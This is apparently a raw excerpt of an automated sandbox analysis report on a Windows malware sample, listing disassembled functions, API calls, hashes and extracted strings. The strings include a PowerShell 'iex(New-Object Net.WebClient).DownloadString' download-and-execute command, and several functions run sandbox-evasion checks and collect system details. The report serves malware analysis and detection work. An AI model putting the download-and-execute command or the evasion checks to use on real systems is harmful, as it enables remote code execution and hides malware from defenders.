                                    Download Yara Rule
                                    APIs
                                    • strtok_s.MSVCRT ref: 00413588
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • strtok_s.MSVCRT ref: 004136D1
                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00A12D90,?,0042110C,?,00000000), ref: 0041A82B
                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpystrtok_s$lstrlen
                                    • String ID:
                                    • API String ID: 3184129880-0
                                    • Opcode ID: dbbd9b12a914175184af0c3d7732a4fa56912c4259726abfbaa9763b1c27244b
                                    • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                    • Opcode Fuzzy Hash: dbbd9b12a914175184af0c3d7732a4fa56912c4259726abfbaa9763b1c27244b
                                    • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                    Function 0041B38C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __lock.LIBCMT ref: 0041B39A
                                      • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                      • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                      • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                    • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                    • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                      • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                    • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                    • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                    • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                    • String ID:
                                    • API String ID: 2005412495-0
                                    • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                    • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                    • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                    • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                    Function 007F6C57 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 007F9B08
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 007F9B21
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 007F9B39
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 007F9B51
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 007F9B6A
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 007F9B82
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 007F9B9A
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 007F9BB3
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 007F9BCB
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 007F9BE3
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 007F9BFC
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 007F9C14
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 007F9C2C
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 007F9C45
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007E1437: ExitProcess.KERNEL32 ref: 007E1478
                                      • Part of subcall function 007E13C7: GetSystemInfo.KERNEL32(?), ref: 007E13D1
                                      • Part of subcall function 007E13C7: ExitProcess.KERNEL32 ref: 007E13E5
                                      • Part of subcall function 007E1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007E1392
                                      • Part of subcall function 007E1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 007E1399
                                      • Part of subcall function 007E1377: ExitProcess.KERNEL32 ref: 007E13AA
                                      • Part of subcall function 007E1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007E14A5
                                      • Part of subcall function 007E1487: __aulldiv.LIBCMT ref: 007E14BF
                                      • Part of subcall function 007E1487: __aulldiv.LIBCMT ref: 007E14CD
                                      • Part of subcall function 007E1487: ExitProcess.KERNEL32 ref: 007E14FB
                                      • Part of subcall function 007F69D7: GetUserDefaultLangID.KERNEL32 ref: 007F69DB
                                      • Part of subcall function 007E13F7: ExitProcess.KERNEL32 ref: 007E142D
                                      • Part of subcall function 007F7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007E141E), ref: 007F7AE7
                                      • Part of subcall function 007F7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 007F7AEE
                                      • Part of subcall function 007F7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007F7B06
                                      • Part of subcall function 007F7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7B77
                                      • Part of subcall function 007F7B47: RtlAllocateHeap.NTDLL(00000000), ref: 007F7B7E
                                      • Part of subcall function 007F7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 007F7B96
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 007F6D31
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007F6D4F
                                    • CloseHandle.KERNEL32(00000000), ref: 007F6D60
                                    • Sleep.KERNEL32(00001770), ref: 007F6D6B
                                    • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 007F6D81
                                    • ExitProcess.KERNEL32 ref: 007F6D89
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                    • Instruction ID: 89f7dc9b8fcfdd65adecefe8a32e31e8accae757792d321a57008d46b45cca6e
                                    • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                    • Instruction Fuzzy Hash: D33108B5A4020CFADB04FBF0DC5AAFD7379AF19300F504519B606A6692EF785A44CA62
                                    Function 007E9C27 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E9C53
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 007E9C78
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 007E9C98
                                    • ReadFile.KERNEL32(000000FF,?,00000000,007E16F6,00000000), ref: 007E9CC1
                                    • LocalFree.KERNEL32(007E16F6), ref: 007E9CF7
                                    • CloseHandle.KERNEL32(000000FF), ref: 007E9D01
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                    • Instruction ID: fc0a8ea26d8b58a7c8ef120437fa662c8dfdbda943ef9d4a92d788ded3448621
                                    • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                    • Instruction Fuzzy Hash: E4314BB9A00209EFDB10DFA5C885BEE77F5FF48304F208158E905A7290D738AA41CFA1
                                    Function 004099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 41a9ac40214c004258481c146167ca84ac173594ef3507387ebcdc5aa67caad4
                                    • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                    • Opcode Fuzzy Hash: 41a9ac40214c004258481c146167ca84ac173594ef3507387ebcdc5aa67caad4
                                    • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                    Function 007FCC45 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 007FCC51
                                      • Part of subcall function 007FC206: __getptd_noexit.LIBCMT ref: 007FC209
                                      • Part of subcall function 007FC206: __amsg_exit.LIBCMT ref: 007FC216
                                    • __amsg_exit.LIBCMT ref: 007FCC71
                                    • __lock.LIBCMT ref: 007FCC81
                                    • InterlockedDecrement.KERNEL32(?), ref: 007FCC9E
                                    • free.MSVCRT ref: 007FCCB1
                                    • InterlockedIncrement.KERNEL32(0042B980), ref: 007FCCC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                    • String ID:
                                    • API String ID: 634100517-0
                                    • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                    • Instruction ID: 69804d4a550488cd7eff3c20eb2f24b5df893ef1f04b78c156a066effa498c31
                                    • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                    • Instruction Fuzzy Hash: D901D231A01A2CEBC722AB699A4A77D7760FF14710F404116EE1867390C73C6841EFF9
                                    Function 0041C9DE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 0041C9EA
                                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                    • __amsg_exit.LIBCMT ref: 0041CA0A
                                    • __lock.LIBCMT ref: 0041CA1A
                                    • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                    • free.MSVCRT ref: 0041CA4A
                                    • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                    • String ID:
                                    • API String ID: 634100517-0
                                    • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                    • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                    • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                    • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                    Function 007F7167 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strlen.MSVCRT ref: 007F7186
                                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,007F7401,00000000,00420BA8,00000000,00000000), ref: 007F71B4
                                      • Part of subcall function 007F6E37: strlen.MSVCRT ref: 007F6E48
                                      • Part of subcall function 007F6E37: strlen.MSVCRT ref: 007F6E6C
                                    • VirtualQueryEx.KERNEL32(007F7574,00000000,?,0000001C), ref: 007F71F9
                                    • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007F7401), ref: 007F731A
                                      • Part of subcall function 007F7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 007F705F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strlen$MemoryProcessQueryReadVirtual
                                    • String ID: @
                                    • API String ID: 2950663791-2766056989
                                    • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                    • Instruction ID: 640181949de04ab6c6d25dbe791e67f957656c86a11f7914e633b390dcc32740
                                    • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                    • Instruction Fuzzy Hash: 4551D4B5A0410DEBDB08CF99D981AFFB7B5BF88300F148519FA15A7340D738AA11DBA5
                                    Function 00416F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strlen.MSVCRT ref: 00416F1F
                                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                      • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                      • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                    • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                      • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strlen$MemoryProcessQueryReadVirtual
                                    • String ID: @
                                    • API String ID: 2950663791-2766056989
                                    • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                    • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                    • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                    • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                    Function 004069B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: *n@$*n@
                                    • API String ID: 1029625771-193229609
                                    • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                    • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                    • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                    • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                    Function 007F49E7 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,0064A30C), ref: 007F4A42
                                      • Part of subcall function 007F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F9072
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F4A68
                                    • lstrcat.KERNEL32(?,?), ref: 007F4A87
                                    • lstrcat.KERNEL32(?,?), ref: 007F4A9B
                                    • lstrcat.KERNEL32(?,0064A284), ref: 007F4AAE
                                    • lstrcat.KERNEL32(?,?), ref: 007F4AC2
                                    • lstrcat.KERNEL32(?,0064A2C8), ref: 007F4AD6
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007F8FF7: GetFileAttributesA.KERNEL32(00000000,?,007E1DBB,?,?,0042565C,?,?,00420E1F), ref: 007F9006
                                      • Part of subcall function 007F47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007F47E7
                                      • Part of subcall function 007F47D7: RtlAllocateHeap.NTDLL(00000000), ref: 007F47EE
                                      • Part of subcall function 007F47D7: wsprintfA.USER32 ref: 007F480D
                                      • Part of subcall function 007F47D7: FindFirstFileA.KERNEL32(?,?), ref: 007F4824
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                    • Instruction ID: 48b8e4e23b5f370f282ea9b76be55c50145a932189c9656e67ce291318fe3fe7
                                    • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                    • Instruction Fuzzy Hash: AE3162FA94020CABDB14FBF0CC8AEF97379AB58700F4045C9B35596181DEB89789CB95
                                    Function 00412C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                    Strings
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                    • ')", xrefs: 00412CB3
                                    • <, xrefs: 00412D39
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 5f8ae31bfa9754787a169228238118935e8d59a2c42068384eb8c8c7280cf3ad
                                    • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                    • Opcode Fuzzy Hash: 5f8ae31bfa9754787a169228238118935e8d59a2c42068384eb8c8c7280cf3ad
                                    • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                    Function 007E1487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007E14A5
                                    • __aulldiv.LIBCMT ref: 007E14BF
                                    • __aulldiv.LIBCMT ref: 007E14CD
                                    • ExitProcess.KERNEL32 ref: 007E14FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
